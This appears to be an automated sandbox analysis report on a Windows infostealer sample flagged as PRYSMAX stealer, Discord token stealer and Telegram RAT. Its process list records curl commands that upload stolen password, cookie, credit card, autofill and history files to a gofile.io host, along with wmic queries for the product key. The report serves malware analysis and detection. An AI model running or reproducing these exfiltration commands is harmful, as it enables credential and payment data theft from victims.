                                                                                                                                                                                                                                                                              2024-12-21 20:51:42 UTC461INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 7b 22 73 65 72 76 65 72 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 2d 65 75 2d 70 61 72 2d 33 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 36 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 35 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 34 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 31 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 5d 2c 22 73 65 72 76 65 72 73 41 6c 6c 5a 6f 6e 65 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 33 22 2c 22 7a 6f 6e 65 22 3a 22 6e 61 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65
                                                                                                                                                                                                                                                                              Data Ascii: {"status":"ok","data":{"servers":[{"name":"store-eu-par-3","zone":"eu"},{"name":"store6","zone":"eu"},{"name":"store5","zone":"eu"},{"name":"store4","zone":"eu"},{"name":"store1","zone":"eu"}],"serversAllZone":[{"name":"store3","zone":"na"},{"name":"store


                                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                              Start time:15:51:31
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\main.exe"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff733390000
                                                                                                                                                                                                                                                                              File size:27'577'634 bytes
                                                                                                                                                                                                                                                                              MD5 hash:C0E4C8F676E781C9DD3D57FFA4F99111
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                                              Start time:15:51:31
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                              Start time:15:51:35
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\main.exe"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff733390000
                                                                                                                                                                                                                                                                              File size:27'577'634 bytes
                                                                                                                                                                                                                                                                              MD5 hash:C0E4C8F676E781C9DD3D57FFA4F99111
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PRYSMAXSTEALER, Description: Yara detected PRYSMAX STEALER, Source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                              Start time:15:51:36
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                                              Imagebase:0x7ff623550000
                                                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x40000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:wmic path softwarelicensingservice get OA3xOriginalProductKey
                                                                                                                                                                                                                                                                              Imagebase:0x7ff623550000
                                                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                                              Start time:15:51:48
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6ce040000
                                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                Execution Coverage:10%
                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                Signature Coverage:16.1%
                                                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                                                Total number of Limit Nodes:73
                                                                                                                                                                                                                                                                                execution_graph 16995 7ff7333a65e4 16996 7ff7333a661b 16995->16996 16997 7ff7333a65fe 16995->16997 16996->16997 16999 7ff7333a662e CreateFileW 16996->16999 17046 7ff7333a5e28 16997->17046 17001 7ff7333a6662 16999->17001 17002 7ff7333a6698 16999->17002 17020 7ff7333a6738 GetFileType 17001->17020 17052 7ff7333a6bc0 17002->17052 17003 7ff7333a5e48 _get_daylight 11 API calls 17006 7ff7333a660b 17003->17006 17049 7ff7333ab824 17006->17049 17009 7ff7333a66a1 17073 7ff7333a5dbc 17009->17073 17010 7ff7333a66cc 17078 7ff7333a6980 17010->17078 17012 7ff7333a6677 CloseHandle 17016 7ff7333a6616 17012->17016 17013 7ff7333a668d CloseHandle 17013->17016 17019 7ff7333a66ab 17019->17016 17021 7ff7333a6843 17020->17021 17022 7ff7333a6786 17020->17022 17024 7ff7333a684b 17021->17024 17025 7ff7333a686d 17021->17025 17023 7ff7333a67b2 GetFileInformationByHandle 17022->17023 17027 7ff7333a6abc 21 API calls 17022->17027 17028 7ff7333a67db 17023->17028 17029 7ff7333a685e GetLastError 17023->17029 17024->17029 17030 7ff7333a684f 17024->17030 17026 7ff7333a6890 PeekNamedPipe 17025->17026 17045 7ff7333a682e 17025->17045 17026->17045 17031 7ff7333a67a0 17027->17031 17032 7ff7333a6980 51 API calls 17028->17032 17034 7ff7333a5dbc _fread_nolock 11 API calls 17029->17034 17033 7ff7333a5e48 _get_daylight 11 API calls 17030->17033 17031->17023 17031->17045 17036 7ff7333a67e6 17032->17036 17033->17045 17034->17045 17095 7ff7333a68e0 17036->17095 17040 7ff7333a68e0 10 API calls 17041 7ff7333a6805 17040->17041 17042 7ff7333a68e0 10 API calls 17041->17042 17043 7ff7333a6816 17042->17043 17044 7ff7333a5e48 _get_daylight 11 API calls 17043->17044 17043->17045 17044->17045 17102 7ff73339bb10 17045->17102 17047 7ff7333ac1c8 _get_daylight 11 API calls 17046->17047 17048 7ff7333a5e31 17047->17048 17048->17003 17116 7ff7333ab6bc 17049->17116 17051 7ff7333ab83d 17051->17016 17053 7ff7333a6bf6 17052->17053 17054 7ff7333a5e48 _get_daylight 11 API calls 17053->17054 17072 7ff7333a6c8e __vcrt_freefls 17053->17072 17056 7ff7333a6c08 17054->17056 17055 7ff73339bb10 _log10_special 8 API calls 17057 7ff7333a669d 17055->17057 17058 7ff7333a5e48 _get_daylight 11 API calls 17056->17058 17057->17009 17057->17010 17059 7ff7333a6c10 17058->17059 17168 7ff7333a8d44 17059->17168 17061 7ff7333a6c25 17062 7ff7333a6c37 17061->17062 17063 7ff7333a6c2d 17061->17063 17065 7ff7333a5e48 _get_daylight 11 API calls 17062->17065 17064 7ff7333a5e48 _get_daylight 11 API calls 17063->17064 17069 7ff7333a6c32 17064->17069 17066 7ff7333a6c3c 17065->17066 17067 7ff7333a5e48 _get_daylight 11 API calls 17066->17067 17066->17072 17068 7ff7333a6c46 17067->17068 17070 7ff7333a8d44 45 API calls 17068->17070 17071 7ff7333a6c80 GetDriveTypeW 17069->17071 17069->17072 17070->17069 17071->17072 17072->17055 17074 7ff7333ac1c8 _get_daylight 11 API calls 17073->17074 17075 7ff7333a5dc9 __free_lconv_mon 17074->17075 17076 7ff7333ac1c8 _get_daylight 11 API calls 17075->17076 17077 7ff7333a5deb 17076->17077 17077->17019 17080 7ff7333a69a8 17078->17080 17079 7ff7333a66d9 17088 7ff7333a6abc 17079->17088 17080->17079 17262 7ff7333b0994 17080->17262 17082 7ff7333a6a3c 17082->17079 17083 7ff7333b0994 51 API calls 17082->17083 17084 7ff7333a6a4f 17083->17084 17084->17079 17085 7ff7333b0994 51 API calls 17084->17085 17086 7ff7333a6a62 17085->17086 17086->17079 17087 7ff7333b0994 51 API calls 17086->17087 17087->17079 17089 7ff7333a6ad6 17088->17089 17090 7ff7333a6b0d 17089->17090 17092 7ff7333a6ae6 17089->17092 17091 7ff7333b0828 21 API calls 17090->17091 17093 7ff7333a6af6 17091->17093 17092->17093 17094 7ff7333a5dbc _fread_nolock 11 API calls 17092->17094 17093->17019 17094->17093 17096 